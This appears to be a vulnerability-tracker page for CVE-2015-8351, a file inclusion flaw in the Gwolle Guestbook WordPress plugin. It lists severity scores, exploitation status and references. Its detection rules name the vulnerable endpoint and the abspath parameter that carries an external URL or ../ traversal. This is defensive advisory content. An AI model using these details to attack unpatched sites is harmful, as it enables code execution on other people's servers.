CVE-2015-8351
published 2017-09-11CVE-2015-8351: PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote…
PriorityP179critical9CVSS 3.0
AVNACHPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
37.03%
98.3th percentile
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gwolle_guestbook_project | gwolle_guestbook | <= 1.5.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP GET requests to ajaxresponse.php containing a URL or directory traversal sequence in the 'abspath' parameter, indicating RFI or LFI exploitation attempts. ↗
- →Alert on requests to /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php with an external URL value in the abspath parameter (RFI vector). ↗
- →LFI exploitation is possible even when allow_url_include is disabled; monitor for directory traversal sequences (e.g., ../) in the abspath parameter regardless of server configuration. ↗
- ·RFI exploitation requires allow_url_include to be set to 1 in PHP configuration; LFI exploitation is possible regardless of this setting. ↗
CVSS provenance
nvdv3.09.0CRITICALCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck9.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-59v2-j7v3-6gmx: PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1
ghsa_unreviewed·2022-05-14
CVE-2015-8351 [CRITICAL] CWE-94 GHSA-59v2-j7v3-6gmx: PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.
VulnCheck
gwolle_guestbook_project gwolle_guestbook Improper Control of Generation of Code ('Code Injection')
vulncheck·2015·CVSS 9.0
CVE-2015-8351 [CRITICAL] gwolle_guestbook_project gwolle_guestbook Improper Control of Generation of Code ('Code Injection')
gwolle_guestbook_project gwolle_guestbook Improper Control of Generation of Code ('Code Injection')
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captcha/ajaxresponse.php. NOTE: this can also be leveraged to include and execute arbitrary local files via directory traversal sequences regardless of whether allow_url_include is enabled.
Affected: gwolle_guestbook_project gwolle_guestbook
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/th
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/134599/WordPress-Gwolle-Guestbook-1.5.3-Remote-File-Inclusion.htmlhttp://www.securityfocus.com/archive/1/537020/100/0/threadedhttps://wordpress.org/plugins/gwolle-gb/changelog/https://www.exploit-db.com/exploits/38861/https://www.htbridge.com/advisory/HTB23275http://packetstormsecurity.com/files/134599/WordPress-Gwolle-Guestbook-1.5.3-Remote-File-Inclusion.htmlhttp://www.securityfocus.com/archive/1/537020/100/0/threadedhttps://wordpress.org/plugins/gwolle-gb/changelog/https://www.exploit-db.com/exploits/38861/https://www.htbridge.com/advisory/HTB23275
2017-09-11
Published
Exploited in the wild